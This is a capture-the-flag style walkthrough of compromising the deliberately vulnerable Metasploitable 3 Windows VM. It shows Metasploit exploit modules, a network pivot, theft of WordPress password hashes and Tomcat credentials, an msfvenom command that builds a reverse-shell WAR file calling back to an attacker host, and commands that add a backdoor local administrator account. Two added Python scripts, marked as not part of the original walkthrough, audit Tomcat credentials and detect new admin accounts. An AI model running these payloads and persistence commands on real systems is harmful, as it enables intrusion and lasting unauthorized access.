Metasploitable 3 Walkthrough - Getting System
Building the VM
The setup process was reasonably straightforward, if a little time consuming. After installing a couple of the dependencies which I didn't already have, I ran the included 'build_win2008.ps1' script which took care of everything for me. Setup did take a couple of hours so don't expect to get going quickly.
Once the build was completed, I changed the network settings in VirtualBox to add the machine to a NAT network with my Kali box.
Recon
After running netdiscover to get the target IP, I kicked off an nmap scan.
At this point I spent some time connecting to each service, grabbing version numbers and generally seeing what was available.
Gaining a foothold
Port 8383 is running ManageEngine Desktop Central 9, which has an arbitrary file upload vulnerability (CVE-2015-8249). Unsurprisingly, there is a Metasploit module for this vulnerability.
Running the exploit/windows/http/manageengine_connectionid_write exploit provided my first shell, running as 'nt authority\local service'.
With my new shell, I spent some time enumerating the target, looking for ways to escalate privileges. There appeared to be many more applications installed than were visible from my initial Nmap scan.
Running ipconfig revealed that the target has another NIC, sat on a different network. To access the new network, I set up a pivot through my meterpreter session.
route add 172.28.128.3 255.255.255.0 1
I then set up the Metasploit socks4 proxy, allowing me to use my web browser/Burp to access the new network.
More recon
After setting up proxychains I ran Nmap over the new network.
This revealed plenty of new apps to dig into. As before, I took a quick look at each new open port, looking for easy wins and known exploits.
WordPress
During my recon, I discovered that the MySQL instance running on port 3306 allowed root to authenticate without a password.
Using this access, I was able to pull usernames and hashed passwords from the WordPress database.
mysql> select user_login, user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 |
| vagrant    | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ |
| user       | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ |
| manager    | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 |
+------------+------------------------------------+
As this is an intentionally vulnerable target, I was confident that the passwords would be weak. I set John running against the admin hash, which soon found the password.
Running WPScan against the WordPress install on port 8585 revealed a vulnerable version of Ninja Forms (CVE-2016-1209). Again, there is a Metasploit module available for this install.
After fixing the WordPress install (see a later section), I attempted to run the Metasploit exploit for the vulnerable plugin. Despite multiple attempts, I was not able to get it to work. The exploit relies on a relative path to a Ninja Forms page, which I was not able to find. I tried adding a new form through the admin interface, which simply did not work. Defeated, I moved on.
Jenkins
There is a Jenkins instance running on port 8484, which can be exploited with exploit/multi/http/jenkins/jenkins_script_console. This is also running as the local service account.
Tomcat
Tomcat is running on port 8484, but requires credentials to access the management interface. As I already had a shell, I was able to retrieve the credentials from the tomcat-users.xml file, located at c:\program files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf.
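As an added defensive check (this is not code from the walkthrough or from the Metasploitable project), the following Python script audits a tomcat-users.xml file for exactly the weakness used above: accounts holding Manager roles whose passwords are stored in the clear, so that anyone who can read the conf directory gets deployment rights. The sample XML, the list of privileged roles and the "looks like a digest" heuristic are assumptions constructed for the example.

```python
"""Audit tomcat-users.xml for privileged roles and cleartext passwords.

Added example, not part of the walkthrough. The sample file, the set of
privileged roles and the digest heuristic are assumptions for illustration.
"""
import re
import xml.etree.ElementTree as ET

# Roles that allow deploying applications or administering the server via
# the Manager and Host Manager web applications (assumed list).
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Heuristic: a value that is only hex digits, or has the salt$iterations$hash
# shape produced by a digest credential handler, is treated as digested;
# anything else is assumed to be a cleartext password.
DIGEST_RE = re.compile(r"^(?:[0-9a-f]{32,}|[^$]*\$\d+\$[0-9a-f]+)$", re.IGNORECASE)

# Constructed sample in the tomcat-users.xml layout (not the target's file).
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="viewer"/>
  <user username="webadmin" password="webadmin" roles="manager-gui,manager-script"/>
  <user username="reports" password="8f8e4a7c3c2b1d0e9f8a7b6c5d4e3f21" roles="viewer"/>
  <user username="deploy" password="D3ploy!" roles="manager-script"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the namespace from an ElementTree tag: '{ns}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def parse_users(xml_text):
    """Return (username, password, roles) tuples from a tomcat-users document."""
    root = ET.fromstring(xml_text)
    users = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        users.append((el.get("username", ""), el.get("password", ""), roles))
    return users


def audit(xml_text):
    """Map each risky username to the list of issues found for it."""
    findings = {}
    for name, password, roles in parse_users(xml_text):
        issues = []
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            issues.append("privileged roles: " + ", ".join(privileged))
        if password and not DIGEST_RE.match(password):
            issues.append("cleartext password stored")
        if password and password.lower() == name.lower():
            issues.append("password equals username")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit(SAMPLE_XML).items():
        print(f"{user}: {'; '.join(issues)}")
```

Run against a real conf directory, the two findings to act on are the same two the walkthrough exploited: store digested rather than cleartext credentials (Tomcat's Realm supports a CredentialHandler for this) and tighten the NTFS ACLs on conf so a low-privileged service account such as LOCAL SERVICE cannot read the file at all.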
With access to the manager interface, I was able to upload a WAR file containing a reverse shell, which was created with msfvenom.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.0.10 LPORT=4445 -f war > shell.war
After starting a Metasploit handler and executing the uploaded shell, I was rewarded with a shell running as system!
Persistence
To avoid having to chain exploits every time I wanted to access the system, I decided to add my own local administrator level user.
net users hacker hacker /add
net localgroup administrators hacker /add
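From the defender's side, the two commands above leave a very recognisable trail in the Windows Security log: Event ID 4720 (a user account was created) followed seconds later by Event ID 4732 (a member was added to a security-enabled local group) naming BUILTIN\Administrators. The Python below is an added example, not part of the walkthrough, that correlates those two events over constructed sample records; the record field names are assumptions, not the real event schema.

```python
"""Flag new local administrator accounts from Windows Security event data.

Added example, not part of the walkthrough. The records below are
constructed, simplified versions of Event ID 4720 (user account created)
and 4732 (member added to a security-enabled local group); the field names
are assumptions, not the real event schema.
"""
from datetime import datetime, timedelta

# Well-known SID of the BUILTIN\Administrators group.
BUILTIN_ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample events (ISO timestamps, one host).
SAMPLE_EVENTS = [
    {"time": "2016-11-20T08:00:00", "id": 4720, "target": "svc_backup",
     "subject": "WIN2008\\itadmin", "host": "WIN2008"},
    {"time": "2016-11-20T08:00:30", "id": 4732, "member": "svc_backup",
     "group": "Backup Operators", "group_sid": "S-1-5-32-551",
     "subject": "WIN2008\\itadmin", "host": "WIN2008"},
    {"time": "2016-11-20T09:15:00", "id": 4732, "member": "helpdesk",
     "group": "Administrators", "group_sid": BUILTIN_ADMINISTRATORS_SID,
     "subject": "WIN2008\\itadmin", "host": "WIN2008"},
    # The pattern from the walkthrough: an account is created by a service
    # running as SYSTEM and added to Administrators seconds later.
    {"time": "2016-11-20T21:14:02", "id": 4720, "target": "hacker",
     "subject": "NT AUTHORITY\\SYSTEM", "host": "WIN2008"},
    {"time": "2016-11-20T21:14:09", "id": 4732, "member": "hacker",
     "group": "Administrators", "group_sid": BUILTIN_ADMINISTRATORS_SID,
     "subject": "NT AUTHORITY\\SYSTEM", "host": "WIN2008"},
]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def find_new_local_admins(events, window=timedelta(minutes=10)):
    """Return one alert per addition to BUILTIN\\Administrators.

    Severity is 'high' when the same host logged a 4720 for that account
    within `window` before the 4732 (a brand-new admin account), otherwise
    'medium' (an existing account was elevated)."""
    created = {}
    for e in events:
        if e["id"] == 4720:
            created[(e["host"], e["target"].lower())] = _ts(e["time"])

    alerts = []
    for e in sorted(events, key=lambda x: _ts(x["time"])):
        if e["id"] != 4732 or e.get("group_sid") != BUILTIN_ADMINISTRATORS_SID:
            continue
        when = _ts(e["time"])
        created_at = created.get((e["host"], e["member"].lower()))
        is_new = created_at is not None and timedelta(0) <= when - created_at <= window
        alerts.append({
            "time": e["time"],
            "host": e["host"],
            "account": e["member"],
            "added_by": e["subject"],
            "severity": "high" if is_new else "medium",
            "reason": (
                f"account created {int((when - created_at).total_seconds())}s "
                "before being added to Administrators" if is_new
                else "existing account added to Administrators"
            ),
        })
    return alerts


if __name__ == "__main__":
    for a in find_new_local_admins(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['time']} {a['host']}: {a['account']} "
              f"added by {a['added_by']} ({a['reason']})")
```

Matching on the group SID rather than the display name keeps the rule working on localised systems. The subject field is worth surfacing in the alert as well: a local account being created by NT AUTHORITY\SYSTEM rather than an interactive administrator is exactly what a web-application shell looks like from the log's point of view.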
With my new user, I was able to remote desktop directly to the server.
Final thoughts
I really enjoyed this version of Metasploitable; being forced to use pivots and attack multiple services to gain system felt more 'real world' than simply firing off an exploit and getting root. This version was only a couple of days old when I started, and there were some bugs present. The most noticeable was that the script which populates all the flags simply did not run (which I discovered after many hours spent digging through the file system and resorting to cheating by reading the setup scripts).
BONUS - Flags!
Despite my issues with the setup scripts, I did manage to find two flags while digging through the VM. Both are located within the WordPress install.
When first accessed, the WordPress install has a base URL set which is not the target URL. As I had root access to the database, I updated the base URL in the wp_options table. I could have set up a rule in Burp to fix the issue, but I wanted to fix it permanently.
Once the WordPress base URL problems are resolved, the site will load and display a link to the first flag, the 'king of hearts'.
After logging in as the WordPress admin, viewing the site will reveal a hidden post containing the 'king of diamonds'.
After tweeting an image of the king of hearts, one of the Rapid7 devs announced that I had found the first ever Metasploitable3 flag, which was an unexpected honor!